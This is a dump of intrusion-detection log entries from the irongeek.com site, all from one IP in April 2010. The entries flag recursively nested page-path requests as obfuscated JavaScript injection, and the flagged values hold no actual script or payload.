Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121725
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121726
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121727
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121728
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121729
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121730
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121731
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121732
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121733
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121734
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121735
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121736
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121737
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121738
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121691
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121692
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121693
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121694
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121695
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121696
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121697
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121698
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121699
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121700
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121701
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121702
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121703
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121704
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121705
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121706
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121707
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121708
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121709
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121710
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121711
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121712
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:28
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121675
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121676
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121677
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121678
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121679
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121680
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121681
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121682
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121683
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121684
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121685
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121686
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121687
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121688
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121689
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121690
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:27
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121665
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121666
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121667
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121668
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121669
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121670
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121671
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121672
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121673
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121674
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:26
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121649
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121650
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121651
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121652
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121653
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121654
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121655
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121656
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121657
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121658
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121659
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121660
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121661
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121662
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121663
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:20
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121664
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/newscat.php
